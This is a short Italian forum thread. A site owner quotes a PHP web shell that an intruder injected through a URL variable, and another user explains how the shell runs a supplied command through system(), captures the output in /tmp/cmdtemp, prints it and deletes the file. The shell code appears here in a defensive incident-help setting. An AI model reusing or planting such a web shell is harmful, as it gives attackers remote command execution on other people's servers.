semplice ha provato a lanciare il comando $cmd, che non so cosa contiene, dopo di che ha inviato il contenuto a /tmp/cmdtemp e gli errori sempre liOriginariamente inviato da pacovox
Dalle statistiche ho visto che qualcuno è entrato nel mio sito passando come variabile uno script in php così fatto:
Vorrei capire questo furbone cosa ha fatto o cercato di fare.codice:</center><font size="2"><pre> bash-2.05# <? if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); $output = str_replace("\n","\nbash-2.05# ",$output); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> </pre> <? die(); ?>
Qualcuno potrebbe darmi delle delucidazioni e magari che accorgimenti adottare?
Grazie
dopo di che ha stampato il contenuto di cmdtemp e poi lo ha eliminato
nel frattempo ha stampato il codice a video eliminando i dati che non gli interessavano e a questo punto ha sostituito a < e > i rispettivi codici html
SICURAMENTE $chdir e $cmd erano parametri passati dalla stringa di comando ^^
ti conviene vedere cosa ha passato, anche per sapere quanto ti devi allarmare![]()